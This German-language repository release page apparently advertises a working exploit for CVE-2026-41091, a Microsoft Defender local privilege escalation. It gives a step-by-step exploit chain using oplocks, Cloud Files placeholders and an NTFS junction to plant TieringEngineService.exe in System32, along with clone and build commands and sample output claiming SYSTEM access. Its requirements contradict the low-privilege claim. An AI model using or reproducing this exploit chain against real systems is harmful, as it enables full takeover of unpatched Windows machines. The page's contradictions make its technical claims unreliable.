ZurΓΌck zu den Updates
New releaseAug 20, 2026

CVE-2026-41091-PoC-Exploit Full-PoCv2

CVE-2026-41091 RedSun | Microsoft-Defender-LPE-Exploit. Niedrigprivilegierte Benutzer erlangen NT AUTHORITY\SYSTEM πŸ”₯ ΓΌber Cloud Files API + NTFS-Junction-Tricks. Zwingt Defender, schΓ€dliche Payloads mit SYSTEM-Rechten nach System32 zu schreiben. ⚠️ Aktiv in freier Wildbahn ausgenutzt. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. πŸ›‘οΈ Nur zu Bildungszwecken (PoC).

Teilen

SolarFlare

β˜€οΈ CVE-2026-41091 - RedSun (SolarFlare) - Microsoft Defender LPE-Exploit

C++ Windows License CVSS CISA KEV

Microsoft Defender Link-Following-Schwachstelle - Lokale Rechteausweitung auf NT AUTHORITY\SYSTEM

Die Schwachstelle ist als "RedSun" bekannt 🎯, "SolarFlare" ist der Name, den ich meinem Exploit gegeben habe. βœ…

πŸ“Œ Übersicht

Dieses Repository enthΓ€lt einen vollstΓ€ndig funktionsfΓ€higen Proof of Concept (PoC)-Exploit fΓΌr CVE-2026-41091, eine kritische lokale Rechteausweitungs-Schwachstelle in Microsoft Defender (Microsoft Malware Protection Engine). Durch die Ausnutzung einer fehlerhaften LinkauflΓΆsung (CWE-59) kann ein authentifizierter Angreifer mit niedrigen Rechten NT AUTHORITY\SYSTEM-Berechtigungen erlangen.

Die Schwachstelle, auch bekannt als "RedSun" oder "SolarFlare", ermΓΆglicht es Angreifern, Microsoft Defender dazu zu bringen, mithilfe der Cloud Files API (CfAPI) und NTFS-Junction-Points beliebige Dateien mit SYSTEM-Berechtigungen an geschΓΌtzte Systemspeicherorte zu schreiben.

Hinweis: Dieses Repository enthΓ€lt zwei Versionen:

  • basic_poc.cpp - Einfache Algorithmus-Demonstration (zu Lehrzwecken)
  • full_poc.cpp - VollstΓ€ndiger funktionsfΓ€higer Exploit mit allen Funktionen

πŸ”₯ Hauptfunktionen

KategorieFunktionen
Ausnutzungβœ… Lokale Rechteausweitung auf SYSTEM
βœ… Cloud Files API (CfAPI) Integration
βœ… Erstellung von Cloud-Platzhaltern
βœ… NTFS-Junction-Umleitung
Technikenβœ… Batch-Oplock-Missbrauch
βœ… VSS-Snapshot-Erkennung
βœ… EICAR-Trigger
βœ… COM-Dienstaktivierung
Zielβœ… Microsoft Defender < 1.1.26040.8
βœ… Windows 10/11
βœ… Windows Server 2019/2022
Benutzerfreundlichkeitβœ… Detaillierte Protokollierung
βœ… Fehlerbehandlung
βœ… ZufΓ€llige Verzeichnisnamen
βœ… Automatische Bereinigung

🎯 Schwachstellendetails

AttributWert
CVE IDCVE-2026-41091
CVSS Score7.8 (Hoch)
CVSS VectorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
AngriffsvektorLokal
Erforderliche RechteNiedrig
BenutzerinteraktionKeine
AuswirkungCodeausfΓΌhrung mit SYSTEM-Rechten
CISA KEVβœ… Ja (aktiv in freier Wildbahn ausgenutzt)
Patch verfΓΌgbarMicrosoft Malware Protection Engine 1.1.26040.8

πŸ“¦ Betroffene Produkte

ProduktBetroffene VersionenBehobene Versionen
Microsoft Malware Protection Engine< 1.1.26040.81.1.26040.8+
Microsoft Defender Antimalware Platform< 4.18.26040.74.18.26040.7+

πŸ”¬ Exploit-Kette

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ SOLARFLARE EXPLOIT CHAIN                                                    β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚                                                                              β”‚
β”‚ 1. Create Working Directory                                                 β”‚
β”‚    └─> %TEMP%\SF-XXXX\                                                      β”‚
β”‚                                                                              β”‚
β”‚ 2. Trigger Defender with EICAR                                              β”‚
β”‚    └─> Write reversed EICAR to bait file                                    β”‚
β”‚                                                                              β”‚
β”‚ 3. Wait for VSS Snapshot                                                    β”‚
β”‚    └─> Detect Volume Shadow Copy creation                                   β”‚
β”‚                                                                              β”‚
β”‚ 4. Create First Batch Oplock                                                β”‚
β”‚    └─> FSCTL_REQUEST_BATCH_OPLOCK on bait file                              β”‚
β”‚                                                                              β”‚
β”‚ 5. Wait for Oplock Break                                                    β”‚
β”‚    └─> Acquire exclusive access                                             β”‚
β”‚                                                                              β”‚
β”‚ 6. Rename Directory                                                         β”‚
β”‚    └─> Move original directory to .tmp                                      β”‚
β”‚                                                                              β”‚
β”‚ 7. Register Cloud Sync Root                                                 β”‚
β”‚    └─> CfRegisterSyncRoot with Cloud Files API                              β”‚
β”‚                                                                              β”‚
β”‚ 8. Create Cloud Placeholder                                                 β”‚
β”‚    └─> CfCreatePlaceholders for bait file                                   β”‚
β”‚                                                                              β”‚
β”‚ 9. Create Second Batch Oplock                                               β”‚
β”‚    └─> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder                      β”‚
β”‚                                                                              β”‚
β”‚ 10. Wait for Second Oplock Break                                            β”‚
β”‚     └─> Acquire exclusive access                                            β”‚
β”‚                                                                              β”‚
β”‚ 11. Rename Cloud Directory                                                  β”‚
β”‚     └─> Move cloud directory to .cloud.tmp                                  β”‚
β”‚                                                                              β”‚
β”‚ 12. Create NTFS Junction to System32                                        β”‚
β”‚     └─> Redirect to C:\Windows\System32                                     β”‚
β”‚                                                                              β”‚
β”‚ 13. Copy Payload to System32                                                β”‚
β”‚     └─> Copy bait file to System32 as TieringEngineService.exe              β”‚
β”‚                                                                              β”‚
β”‚ 14. Activate Service as SYSTEM                                              β”‚
β”‚     └─> CoCreateInstance(StorageTiersManagement)                            β”‚
β”‚                                                                              β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

πŸ“¦ Installation

Voraussetzungen

  • Windows 10/11 oder Windows Server 2019/2022
  • Visual Studio 2019/2022 mit C++-Tools
  • Administratorrechte (fΓΌr die AusfΓΌhrung)

Erstellen

# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# Build using Visual Studio Developer Command Prompt
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Or build basic version
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

πŸ› οΈ Verwendung

VollstΓ€ndiger Exploit (Rechteausweitung auf SYSTEM)

full_poc.exe

Basisalgorithmus-Demonstration

basic_poc.exe

πŸ“‹ Beispielausgabe

Ausgabe des vollstΓ€ndigen Exploits

CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM

[+] SYSTEM access obtained!

Ausgabe des Basis-PoC

CVE-2026-41091 Basic PoC
========================================
  Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe

[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.

πŸ”§ Kompilieranleitung

Mit Visual Studio

  1. Γ–ffnen Sie die Developer-Eingabeaufforderung fΓΌr VS 2022
  2. Navigieren Sie zum Exploit-Verzeichnis
  3. FΓΌhren Sie Folgendes aus:
# Full exploit
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Basic PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

Mit CMake

cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

⚠️ Anforderungen und EinschrÀnkungen

AnforderungDetails
BetriebssystemWindows 10/11, Server 2019/2022
BerechtigungenAdministrator (fΓΌr die AusfΓΌhrung)
DefenderMicrosoft Defender muss aktiviert sein
InternetErforderlich fΓΌr VSS-Snapshot-Erkennung
PatchFunktioniert nur auf ungepatchten Systemen
ArchitekturNur x64

πŸ”— Verwandte Exploits

Schauen Sie sich meine anderen Exploit-Repositories an:

Kategorien